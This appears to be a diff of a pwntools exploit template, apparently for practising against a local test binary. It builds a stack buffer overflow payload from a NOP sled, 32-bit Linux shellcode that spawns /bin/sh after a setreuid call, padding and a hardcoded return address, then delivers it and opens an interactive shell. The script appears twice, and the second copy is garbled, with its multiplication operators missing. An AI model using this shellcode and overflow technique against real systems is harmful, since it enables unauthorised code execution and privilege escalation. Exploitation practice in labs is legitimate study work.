captainGeech42 · May 15, 2018 01:37
diff --git a/pwntools.py b/pwntools.py
 #!/usr/bin/env python

 from pwn import *

 # define our binary
 binary = "/home/user/testbin"

 #### Payloads ####

 # read in our payload
 with file("payload.bin", "rb") as f:
    payload = f.read()

 # build a payload
 shellcode = "\x31\xC0\x31\xDB\x31\xC9\xB0\x46\x66\xBB\xB5\x36\x66\x89\xD9\xCD\x80\x31\xC0\xB0\x0B\x31\xC9\x31\xD2\x52\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x89\xE3\xCD\x80"

 # p32() will encode a dword in little-endian
 # there is also p64() if you are doing 64bit binary exploitation
 payload = "\x90"*20 + shellcode + "A" * 32 + p32(0xffffd350)
    
 #### Running the program ####    

 # deliver payload through argv
 p = process(executable=binary, argv=[binary, payload])

 # deliver payload through user input
 p = process(binary)
 p.sendline(payload)

 #### Getting a shell ####

 p.interactive()
 # if you get a message about receiving an EOF, and you press enter and the shell exits, you didn't actually get a shell
	#!/usr/bin/env python

	from pwn import *

	# define our binary
	binary = "/home/user/testbin"

	#### Payloads ####

	# read in our payload
	with file("payload.bin", "rb") as f:
	payload = f.read()

	# build a payload
	shellcode = "\x31\xC0\x31\xDB\x31\xC9\xB0\x46\x66\xBB\xB5\x36\x66\x89\xD9\xCD\x80\x31\xC0\xB0\x0B\x31\xC9\x31\xD2\x52\x68\x6E\x2F\x73\x68\x68\x2F\x2F\x62\x69\x89\xE3\xCD\x80"

	# p32() will encode a dword in little-endian
	# there is also p64() if you are doing 64bit binary exploitation
	payload = "\x90"20 + shellcode + "A" 32 + p32(0xffffd350)

	#### Running the program ####

	# deliver payload through argv
	p = process(executable=binary, argv=[binary, payload])

	# deliver payload through user input
	p = process(binary)
	p.sendline(payload)

	#### Getting a shell ####

	p.interactive()
	# if you get a message about receiving an EOF, and you press enter and the shell exits, you didn't actually get a shell